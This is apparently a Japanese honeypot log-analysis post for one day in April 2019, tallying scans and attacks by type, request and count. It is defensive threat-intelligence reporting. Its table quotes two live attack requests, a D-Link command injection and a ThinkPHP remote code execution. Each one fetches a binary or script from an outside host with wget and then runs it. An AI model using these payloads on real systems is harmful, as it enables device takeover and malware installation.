BW-Potのログ分析 (2019/04/08)
本日の総アクセス件数は599件です。送信元IP数は68IPです。
・IPTV Stalkerに関する通信を観測しました。
・ThinkPHPに関する攻撃を観測しました。
リクエストのpathがURLエンコードされているものを初めて観測しました。
また、該当のファイルはダウンロードできませんでした。
・D-Link デバイスに関する調査を観測しました。
該当のファイルはダウンロードできませんでした。
//ldskflksという通信を確認しました。
MP3関連のものだとは思うのですが詳細わからず
| 件数 | 種別 | リクエスト |
| 372 | アクセス | GET / |
| 211 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 3 | FreePBXに関する調査 | GET /admin/assets/js/views/login.js |
| 3 | ConferenceManagementSystem Colibriに関する調査 | GET /colibri/conferences |
| 3 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | 不明 | GET //ldskflks |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | Shellshockに関する調査 | GET /cgi-bin/authLogin.cgi |
| 1 | D-Link デバイスに関する調査 | GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.248.18/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ |
| 1 | phpMyAdminに関する調査 | GET /phpmyadmin |
| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://185.244.25[.]168/shenzi.x86;cat%20shenzi.x86%20%3E%20shenzi;chmod%20777%20shenzi;./shenzi |
| 1 | IPTV Stalkerに関する調査 | GET /stalker_portal/LICENSE |
参考サイト
